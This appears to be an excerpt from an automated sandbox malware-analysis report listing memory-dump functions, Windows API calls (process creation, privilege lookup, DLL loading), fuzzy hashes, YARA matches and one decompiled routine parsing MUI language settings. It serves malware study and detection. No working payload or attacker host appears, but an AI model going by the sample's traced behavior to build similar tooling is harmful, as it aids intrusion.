                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction ID: 864711eabb7dc0f9c0a00528bc7204798e3bbfe8ecaf20bba7921b9fd7ea0c89
                                                                                                                                                    • Opcode Fuzzy Hash: 14ba51ac3c4685a444062647e83330cf6da9a5db4e41c8a362ae144bb3555ef6
                                                                                                                                                    • Instruction Fuzzy Hash: B8B012B2200640C7F3199714D90AF4BB310FBD0F00F00CA3AA00781890DA3C992CC44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 024DFED0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction ID: 9b30904a3bfeb6814e26683714e5c097bc05a41d35c26203adaeaac906fc0f52
                                                                                                                                                    • Opcode Fuzzy Hash: 3f3d7aa38811b8d75e7f035be4e9a31914adf6f2f9842a42369159ae9521bbbf
                                                                                                                                                    • Instruction Fuzzy Hash: C9B01272100580C7E34EA714D906B4B7210FB80F00F408A3AA00781891DB789B2CD98A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 024DFFB4, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction ID: 7e2af0442ae64c9f6bb8df8c94f4cb17495a0f0e8e42cafe04a2b86fa0e4786e
                                                                                                                                                    • Opcode Fuzzy Hash: 4dddc10ebfa889a6a675612f7993cc76823eb4169e77ac0f74568cd9575660f9
                                                                                                                                                    • Instruction Fuzzy Hash: A2B012B2104580C7E3099714D906F4B7210FB90F00F40893EA00F81851DB3CD92CD44A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 024DFC60, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 024DFDC0, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction ID: d88988b585cc81dca5f800d6bb39f1198a76ae257c125849f4a62a02810904f6
                                                                                                                                                    • Opcode Fuzzy Hash: 3c5c70486422d4cf76ce1f9e49ddc8b8cfc879bf3efb7896afe645da2070dab7
                                                                                                                                                    • Instruction Fuzzy Hash: 20B01272140540C7E30A9714DA56B4B7220FB80F40F008D3AA04781891DBB89B2CD486
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 024DFD8C, Relevance: 1.5, APIs: 1, Instructions: 6libraryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2358341858.00000000024D0000.00000040.00000001.sdmp, Offset: 024C0000, based on PE: true
                                                                                                                                                    • Associated: 00000008.00000002.2358336152.00000000024C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358434259.00000000025B0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358441192.00000000025C0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358447686.00000000025C4000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358453643.00000000025C7000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358501853.00000000025D0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000008.00000002.2358621738.0000000002630000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction ID: c46011bb0c46dfed5c8ab186c0f719e5b9e72ad0d6ef7da6a0d9d2ed8661a3c9
                                                                                                                                                    • Opcode Fuzzy Hash: bc46901120b7194c8a84a042a6f6d6e6859f3849350b0ab548ee1941b68cff92
                                                                                                                                                    • Instruction Fuzzy Hash: 8FB0927110054087E205A704D905B4AB212FB90B00F808A35A4468A591D66A9A28C686
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B6EE0, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000B6F88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                    • Instruction ID: 0596b3b0630162c162b44d240f69932bd1b79e79054c4077a5d6dff263f75c94
                                                                                                                                                    • Opcode Fuzzy Hash: d11e8b4041073f163b1343e021fa061a39d01b82e61f3e32ab48de3e3288184f
                                                                                                                                                    • Instruction Fuzzy Hash: 4F3190B1602705ABC725DFA8D8A1FEBB7F8EB48700F10842DF61A5B242D775A545CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B6ED7, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 81sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • Sleep.KERNELBASE(000007D0), ref: 000B6F88
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Sleep
                                                                                                                                                    • String ID: net.dll$wininet.dll
                                                                                                                                                    • API String ID: 3472027048-1269752229
                                                                                                                                                    • Opcode ID: 7d736f24499de73c4cd765037a25e23e562d4d5ac57cc8c7634e9af0f931ecf6
                                                                                                                                                    • Instruction ID: b97e72fc2bb94317cd6e403c256a181398956afdf1458985636cf530fb19870d
                                                                                                                                                    • Opcode Fuzzy Hash: 7d736f24499de73c4cd765037a25e23e562d4d5ac57cc8c7634e9af0f931ecf6
                                                                                                                                                    • Instruction Fuzzy Hash: 6921A2B1601705ABC764DF64D8A1FEBB7F8FB48700F10802DF6199B242D775A545CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B84D0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,000A3B93), ref: 000B84FD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID: .z`
                                                                                                                                                    • API String ID: 3298025750-1441809116
                                                                                                                                                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction ID: 28dbb0e6efa6f1e5050a2a3f3994edce15d7540395fd5c602ee1b2b7824e1962
                                                                                                                                                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                                                                                                                                                    • Instruction Fuzzy Hash: 51E01AB12002046BD714DF59CC45EE777ACEF88750F018555F90857252CA30E910CAB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000A7260, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 000A72BA
                                                                                                                                                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 000A72DB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                    • Instruction ID: e2a8b8212d7d7b650e4de13a7634eca5075d241c3113985adf95b5a2494c6d64
                                                                                                                                                    • Opcode Fuzzy Hash: 8b955aa86635726f2346a9c8d52cc1bf7f5856a12dc46368d73d443070a20bca
                                                                                                                                                    • Instruction Fuzzy Hash: BA01D631A8022877E721A6D49C03FFE776C9B41B50F154119FF04BA1C3E6A47A0687F6
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000A9B20, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 000A9B92
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Load
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2234796835-0
                                                                                                                                                    • Opcode ID: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction ID: d530e4503ff5972e2628ffe345a9cd9ef5bd1e220e0afd7aed32b025e86c31a8
                                                                                                                                                    • Opcode Fuzzy Hash: 54eed7fb54c4bb33c5ecf3c62be074d2fec7e96364ab3bba8fcd8ce07f2b6dc1
                                                                                                                                                    • Instruction Fuzzy Hash: 01011EB5E0020DBBDF10DAE4ED52FDDB7B89B55308F0041A5AA0897242F671EB14CBA1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B8540, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateProcessInternalW.KERNEL32(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 000B8594
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateInternalProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2186235152-0
                                                                                                                                                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                    • Instruction ID: 0f01cd5a6e7efc6631fb985b2cd88418d3c37a155462f36f7e6df78481741945
                                                                                                                                                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                                                                                                                                    • Instruction Fuzzy Hash: 0C01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA0D97251CA30E851CBA4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B7010, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,000ACCD0,?,?), ref: 000B704C
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CreateThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2422867632-0
                                                                                                                                                    • Opcode ID: 82e3e9625107436aec6a7118588dec7f84456b8be21fd61da69fac5e166c74bb
                                                                                                                                                    • Instruction ID: 8de4edac4cc6da5ed1311d292d0b2dfcb721fb53186267399e178149011b8149
                                                                                                                                                    • Opcode Fuzzy Hash: 82e3e9625107436aec6a7118588dec7f84456b8be21fd61da69fac5e166c74bb
                                                                                                                                                    • Instruction Fuzzy Hash: 40E06D333902043AE3306599AC03FE7B39C8B91B20F540026FB0DEB2C2D595F80142A8
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B8621, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ACFA2,000ACFA2,?,00000000,?,?), ref: 000B8660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 7662eca02077ce0f444890916972ccdef7617b8a4e8b57030e53f4f21f14e40b
                                                                                                                                                    • Instruction ID: 584cbbf0580b82d8a46a7e96bee0ddf63396d46c254adc4e6e94f31d626f39d5
                                                                                                                                                    • Opcode Fuzzy Hash: 7662eca02077ce0f444890916972ccdef7617b8a4e8b57030e53f4f21f14e40b
                                                                                                                                                    • Instruction Fuzzy Hash: 21F0E5B5200204AFDB10DF54CC40EE77B68DF46710F1084A5FA0C57342C930A905CBF1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B8490, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(000B3516,?,000B3C8F,000B3C8F,?,000B3516,?,?,?,?,?,00000000,00000000,?), ref: 000B84BD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction ID: 6eb590c2dfa7aa45113636d6dfe12363ee4ea06e5f6bdebdb426aba41fd35aae
                                                                                                                                                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                                                                                                                                    • Instruction Fuzzy Hash: 6CE012B1200208ABDB14EF99CC41EE777ACEF88650F118959FA085B282CA30F910CBB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000B8630, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,000ACFA2,000ACFA2,?,00000000,?,?), ref: 000B8660
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction ID: 3a4125c7d4676d446c55e049025b15a514ca34bc82565a60a81dfd03524aca03
                                                                                                                                                    • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                                                                                                                                    • Instruction Fuzzy Hash: F4E01AB12002086BDB10DF49CC85EE737ADEF88650F018555FA0857242C930E810CBF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 000AD410, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SetErrorMode.KERNELBASE(00008003,?,?,000A7C63,?), ref: 000AD43B
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000008.00000002.2357526276.00000000000A0000.00000040.00000001.sdmp, Offset: 000A0000, based on PE: false
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ErrorMode
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2340568224-0
                                                                                                                                                    • Opcode ID: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction ID: fada8488cb76abb8c5e1cf75bcd3c23163e9bcb755e71fe6b276d095a080f9de
                                                                                                                                                    • Opcode Fuzzy Hash: 49ec7ea19b45082ce71059444928ac468c46794dc6bfedb52c16374b2d1231c4
                                                                                                                                                    • Instruction Fuzzy Hash: 1BD0A7717503043BE710FBE89C03F6632CC5B55B00F494064F949DB3C3D960F5004565
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    Function 02508788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 94%
                                                                                                                                                    			E02508788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E02508460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E024EE025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0250718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E02508460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0250718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E02508460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E02508460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E02508460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0250718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E024E2340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E024FE679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E024EE2A8(_t322,  &_v68, _v16);
								if(E02505553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E024FE679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E024EE2A8(_t322,  &_v68, _t236);
								if(E02505553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E024EE025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0250718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E024EE0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E024E2340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
